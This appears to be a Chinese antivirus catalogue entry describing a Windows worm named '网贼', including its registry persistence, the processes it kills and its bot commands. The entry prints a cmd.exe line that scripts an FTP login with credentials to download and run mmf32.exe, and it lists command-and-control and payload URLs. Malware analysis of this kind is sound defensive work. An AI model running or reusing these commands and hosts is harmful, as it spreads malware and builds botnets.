病毒名称(中文):
网贼
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
32738
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个通过网络传播的蠕虫病毒,该病毒会尝试自更新,并且开启后门接受控制端的控制,结束安全软件,使被感染的机器成为一台网络僵尸.
1.生成文件:
%System%\mmsvc32.exe
2.添加起始项,使病毒开机启动:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftNetworkServicesController
mmsvc32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftNetworkServicesController
mmsvc32.exe
3.查找并且关闭以下窗口进程,并且自己注册一个该窗口使其无法开启
DBMWin
TDBMWin
4.删除以下键:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftIIS
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
PayTime
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
lp3mr1sh
5.创建线程运行以下的命令:
cmd.exe/cechousernnpy@web.cplnn.com>ntsdd.txt
&&echof729lQjd>>ntsdd.txt
&&echobinary>>ntsdd.txt
&&echogetmmf32.exe>>ntsdd.txt
&&echoquit>>ntsdd.txt
&&ftp-s:ntsdd.txt-n-nnpyf.cplnn.com
&&delntsdd.txt
&&mmf32.exe
6.运行以下命令,结束安全软件进程:
!proc.kill.*ftp.exe
!proc.kill.*tftp.exe
!proc.kill.*nh.exe
!proc.kill.*nethost.exe
!proc.kill.*syshost.exe
!proc.kill.*ppc.exe
!proc.kill.*paytime.exe
!proc.kill.*lp3mr1sh.exe
!proc.kill.*tibs.exe
!proc.kill.*opera.exe
!proc.kill.*netscape.exe
7.尝试连接以下地址:
http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock
8.能接收的命令如下:
!HTTP.DOS
!UDP.DDOS
!PROC.KILL
!RUN
!URL.DOWNLOAD
!UPDATE
!AFTP.CONFIG
!URL.SPOOF
!IE.COUNTER
9.尝试下载以下文件:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe